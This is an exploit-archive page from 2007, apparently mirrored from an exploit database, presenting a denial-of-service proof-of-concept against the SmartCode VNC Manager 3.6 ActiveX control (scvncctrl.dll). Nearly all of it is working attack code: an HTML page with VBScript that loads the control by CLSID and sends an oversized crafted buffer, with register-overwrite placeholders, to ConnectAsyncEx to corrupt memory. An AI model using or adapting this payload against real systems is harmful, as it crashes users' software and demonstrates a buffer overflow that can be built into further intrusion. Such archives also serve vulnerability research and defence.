[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SmartCode VNC Manager 3.6 (scvncctrl.dll) Denial of Service Exploit
# Published : 2007-05-08
# Author : shinnai
# Previous Title : Opera 9.10 alert() Remote Denial of Service Exploit
# Next Title : Versalsoft HTTP File Upload ActiveX 6.36 (AddFile) Remote DoS Exploit
<html>
<object classid='clsid:62FA83F7-20EC-4D62-AC86-BAB705EE1CCD' id='target'></object>
<script language = 'vbscript'>
buff = String(3543,"A")
get_EAX = "aaaa"
get_EBX = "cccc"
buff2 = String(1440,"B")
egg = buff + get_EAX + get_EBX + buff2
target.ConnectAsyncEx egg, 1, "default"
</script>
</html>
# www.Syue.com [2007-05-08]